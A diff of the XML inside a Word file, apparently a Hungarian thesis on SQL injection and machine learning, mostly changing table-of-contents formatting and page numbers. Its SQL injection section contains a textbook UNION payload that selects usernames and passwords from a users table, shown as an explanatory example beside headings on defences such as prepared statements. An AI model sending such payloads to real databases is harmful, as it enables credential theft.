-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961905 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2303,302 +2329,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610880" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Előkészített utasítások (prepared statements) használata</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610880 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610881" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Tárolt eljárások (stored procedures) használata</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610881 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>9</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610882" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Engedélyezőlista (allow-list) bemenetének ellenőrzése</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610882 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TJ3"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610883" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>Az összes felhasználó által adott bemenet elkerülése</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610883 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2611,24 +2348,27 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610884" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961906" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>2.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2638,41 +2378,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>GÉPI TANULÁS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610884 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961906 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2680,14 +2420,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>11</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2700,24 +2439,27 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610885" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961907" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>3.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2727,41 +2469,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>PROGRAM FELÉPÍTÉSE</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610885 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961907 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2769,14 +2511,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>11</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>12</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2789,24 +2530,27 @@
               <w:tab w:val="left" w:pos="660"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610886" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961908" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>4.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
                 <w:lang w:val="hu-HU"/>
@@ -2816,41 +2560,41 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
               </w:rPr>
               <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610886 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961908 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2858,14 +2602,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>11</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>13</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2877,52 +2620,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610887" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961909" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Irodalomjegyzék</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610887 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961909 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -2930,14 +2676,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>12</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>14</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -2949,52 +2694,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610888" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961910" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Nyilatkozat</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610888 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961910 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -3002,14 +2750,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>13</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>15</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -3021,52 +2768,55 @@
             <w:tabs>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
+            <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc70610889" w:history="1">
+          <w:hyperlink w:anchor="_Toc70961911" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:noProof/>
                 <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Köszönetnyilvánítás</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc70610889 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc70961911 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
@@ -3074,14 +2824,13 @@
               <w:rPr>
                 <w:noProof/>
                 <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
-              </w:rPr>
-              <w:t>14</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:webHidden/>
-                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:t>16</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
             </w:r>
@@ -3137,7 +2886,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc70610873"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc70961899"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3457,7 +3206,7 @@
         </w:numPr>
         <w:ind w:left="284" w:hanging="284"/>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc70610874"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc70961900"/>
       <w:r>
         <w:t>SQL INJECTION</w:t>
       </w:r>
@@ -3744,14 +3493,13 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>--</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3849,14 +3597,21 @@
           <w:iCs/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users--</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:vertAlign w:val="superscript"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>1</w:t>
+        <w:t>SELECT name, description FROM products WHERE category = ’Gifts’ UNION SELECT username, password FROM users</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-- </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>[1]</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3947,7 +3702,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc70610875"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc70961901"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3970,6 +3725,39 @@
